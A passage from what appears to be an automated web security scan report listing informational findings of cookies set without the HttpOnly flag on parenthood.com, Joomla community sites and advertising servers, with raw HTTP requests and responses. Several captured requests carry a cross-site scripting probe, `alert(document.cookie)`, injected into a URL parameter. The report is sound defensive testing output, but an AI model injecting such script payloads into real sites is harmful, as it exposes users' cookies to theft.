var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="Dominos=DataXuB3;expires="+B3d.toGMTString()+";path
...[SNIP]...

14.218. http://backend.parenthood.com/jscripts/p7EPMscripts.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://backend.parenthood.com
Path:	/jscripts/p7EPMscripts.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jscripts/p7EPMscripts.js HTTP/1.1
Host: backend.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:08:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 27 Sep 2008 21:38:20 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Content-Type: application/x-javascript
Set-Cookie: BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/
Content-Length: 9757

/*

================================================
PVII Elevator Panel Magic scripts
Copyright (c) 2008 Project Seven Development
www.projectseven.com
Version: 1.3.3 - script bui
...[SNIP]...

14.219. http://backend.parenthood.com/jscripts/shopblog_style05_master.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://backend.parenthood.com
Path:	/jscripts/shopblog_style05_master.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerwww_parenthood.com_http_pool=440556810.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jscripts/shopblog_style05_master.css HTTP/1.1
Host: backend.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:16:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 09 Oct 2008 21:42:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Content-Type: text/css
Set-Cookie: BIGipServerwww_parenthood.com_http_pool=440556810.20480.0000; path=/
Content-Length: 1769

/*
-----------------------------------
Elevator Panels
by Project Seven Development
www.projectseven.com
Style Theme: 05 - Basic
-----------------------------------
*/
.p7EPM05 .p7epm_tri
...[SNIP]...

14.220. http://backend.parenthood.com/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://backend.parenthood.com
Path:	/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /s_code.js HTTP/1.1
Host: backend.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

14.221. http://bh.contextweb.com/bh/set.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Thu, 19-Jan-2012 21:55:49 GMT; Path=/
cwbh1=2709%3B02%2F23%2F2011%3BTOT09; Domain=.contextweb.com; Expires=Tue, 29-Dec-2015 21:55:49 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.222. http://bid.openx.net/json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; version=1; path=/; domain=.openx.net;
p=1295921102; version=1; path=/; domain=.openx.net; max-age=63072000;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1295921102; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_15781025984({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAGWQO07DQBRFzzixM_aYW
...[SNIP]...

14.223. http://bid.openx.net/json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

p=1295929661; version=1; path=/; domain=.openx.net; max-age=63072000;
fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0D7MwAAAxUfwuA8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: _wc[1295921102372]=; version=1; path=/; domain=.openx.net; max-age=0;
Set-Cookie: p=1295929661; version=1; path=/; domain=.openx.net; max-age=63072000;
Set-Cookie: fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0D7MwAAAxUfwuA8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;

(function(){var req={f:OXM_32728599221,o:null,w:10720000,c:"\u003cscript type\u003d'text/javascript'\u003evar isIE \u003d false;\u003c/script\u003e\u003c!--[if IE]\u003e\u003cscript type\u003d'text/ja
...[SNIP]...

14.224. http://bid.openx.net/log previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/log

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_wc[1295921102372]=H4sIAAAAAAAAAONgYGRg0D7MwcDEwNCxkYOBmYEh_zwDANrv7-sWAAAA; version=1; path=/; domain=.openx.net; max-age=2592000;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.225. http://blogsearch.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogsearch.google.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=47fa77d95684576f:TM=1295881311:LM=1295881311:S=7WF0WTQQYZ1xaMCz; expires=Wed, 23-Jan-2013 15:01:51 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.226. http://books.google.com/bkshp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://books.google.com
Path:	/bkshp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=d33f47f272219df9:TM=1295881312:LM=1295881312:S=WikbyyY0JXmoqzCh; expires=Wed, 23-Jan-2013 15:01:52 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bkshp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.227. http://books.google.com/books previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://books.google.com
Path:	/books

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=d431de1ea54b0d62:TM=1295881314:LM=1295881314:S=NrIf36hJf5JjvkvE; expires=Wed, 23-Jan-2013 15:01:54 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.228. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=bs.serving-sys.com; path=/
A3=gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
B3=7lgH0000000001sG852G0000000003sS8cVQ0000000001sV83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=tf&c=19&mc=imp&pli=2150004&PluID=0&ord=1295907707715&rtu=-1 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=53705905654
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingCachedScripts/Res/Blank_1x1.gif
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS8cVQ0000000001sV83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 24 Jan 2011 22:21:02 GMT
Connection: close

14.229. http://c7.zedo.com/OzoDB/cutils/R52_9/jsc/305/egc.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/OzoDB/cutils/R52_9/jsc/305/egc.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,21,0;expires=Wed, 23 Feb 2011 22:30:29 GMT;path=/;domain=.zedo.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.230. http://c7.zedo.com/bar/v16-401/c5/jsc/gl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

FFgeo=5386156;expires=Tue, 24 Jan 2012 21:54:47 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.231. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.w55c.net
Path:	/i/0Rw6qcLcmo_34070076.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 01:35:43 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

14.232. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsn_statp=PnziUhIAAACuZBF8o1XyYQ%3D%3D; Domain=.linksynergy.com; Expires=Sun, 19-Jan-2031 15:01:55 GMT; Path=/
lsn_qstring=Xy0hOcdtU4s%3A145238%3A; Domain=.linksynergy.com; Expires=Tue, 25-Jan-2011 15:01:55 GMT; Path=/
lsn_track=UmFuZG9tSVZr%2B5Qg95vOvRInoLj5bFWQpPhvmyUyQZxMl7BXvJRnSunPLcEDNpg8RczJ2bC7B6SGP9QTzTIiJg%3D%3D; Domain=.linksynergy.com; Expires=Thu, 21-Jan-2021 15:01:55 GMT; Path=/
lsclick_mid24808="2011-01-24 15:01:55.807|Xy0hOcdtU4s-DyfF4yfSMJkYwTSt3bjXEg"; Domain=.linksynergy.com; Expires=Wed, 23-Jan-2013 15:01:55 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.233. http://code.google.com/p/swfobject/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/p/swfobject/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=2a7ca615dc37f0d1:TM=1295908254:LM=1295908254:S=00p2bA3htJm-NcjW; expires=Wed, 23-Jan-2013 22:30:54 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.234. http://community.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

88b9e45a51b17bd9f961adad9aab4c54=04d74cf0b4f61e32b561da5cc9f02fc1; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: community.joomla.org
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.3.10.1295835652

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:20:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 88b9e45a51b17bd9f961adad9aab4c54=04d74cf0b4f61e32b561da5cc9f02fc1; path=/
Last-Modified: Mon, 24 Jan 2011 02:20:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 33586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...

14.235. http://community.joomla.org/showcase/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

e3f36b393f7b576bc345f1ba25fa2851=ff1c090dbcaab6cc278de2960e220011; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.236. http://community.joomla.org/showcase/how-to-submit-a-site.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/how-to-submit-a-site.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

e3f36b393f7b576bc345f1ba25fa2851=be510ddcd2bf15612a74f73f10f6bdfe; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.237. http://community.joomla.org/showcase/sites-of-the-month.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/sites-of-the-month.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

e3f36b393f7b576bc345f1ba25fa2851=ff4fc6ec86026a313be3c261f8519100; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.238. http://community.joomla.org/showcase/sites/advsearch.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/sites/advsearch.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

e3f36b393f7b576bc345f1ba25fa2851=6cd3aab8711a0481615375ee027eb309; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.239. http://community.joomla.org/showcase/sites/new.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.joomla.org
Path:	/showcase/sites/new.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

e3f36b393f7b576bc345f1ba25fa2851=423eae15ca00d1e8cf624b675f042aa5; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.240. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.parenthood.com
Path:	/kickapps/service/getWidgetSwf.kickAction

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

as=40337; Expires=Wed, 26-Jan-2011 02:23:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 02:23:02 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: as=40337; Expires=Wed, 26-Jan-2011 02:23:02 GMT; Path=/
Location: http://kickapps.yuku.com/kickFlash/KickShell.swf?referralUrl=http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1&widgetHost=kickapps.yuku.com&buildVersion=1.0.589
Content-Length: 0
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 02:23:02 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8

14.241. http://comunidadjoomla.org/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://comunidadjoomla.org
Path:	/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

8861b4e100db4cb878a33db82bc27555=00a1c10319baac94765f70e3f43fd867; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html HTTP/1.1
Host: comunidadjoomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 8861b4e100db4cb878a33db82bc27555=00a1c10319baac94765f70e3f43fd867; path=/
Last-Modified: Mon, 24 Jan 2011 14:55:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-es" lang="es-es" dir=
...[SNIP]...

14.242. http://cspix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cspix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
clid=2lebnns011706ch47d7o8wtv181qq00f0o01050110e; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
rdrlst=20s0so2ylebnns0000000f0o01050110e7dpletz4d0000000b0o01050110bmmnlebnns0000000f0o01050110e10rlfjpei000000010o010501101x1blebnns0000000f0o01050110exo1lebnns0000000f0o01050110eeh5lf17qf000000070o0105011076bylemlne0000000d0o01050110dw3clebnns0000000f0o01050110e7gmlebnns0000000f0o01050110ejv6lebnns0000000f0o01050110ej4ilew2e2000000090o010501109xthlebnns0000000f0o01050110efullf8gij000000030o010501103jillebnns0000000f0o01050110efuqlegh2b0000000e0o01050110eb6mlf17qk000000060o010501106mz1lebnns0000000f0o01050110ep7vlebnns0000000f0o01050110exvslebnns0000000f0o01050110exuklebnns0000000f0o01050110ex1jlebnns0000000f0o01050110ejk7lebnns0000000f0o01050110eyiplebnns0000000f0o01050110exwflebnns0000000f0o01050110eyh0lebnns0000000f0o01050110ee4vlebnns0000000f0o01050110exwblebnns0000000f0o01050110e; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo000000050o01050110582gletz4d0pqa500a0l000400100ag2leqh190t8d900c0o01050110c82hlebnns181qq00f0o01050110e9zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000010o010501101820lebnns181qq00e0l000400100b0olfjpei000000010o010501101ab4lebnns181qq00f0o01050110e9szlebnns181qq00f0o01050110e8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b138c700e0o01050110eal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei000000010o0105011018bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns181qq00e0l000400100b08lfjpei000000010o01050110140slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc000000020o01050110240uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
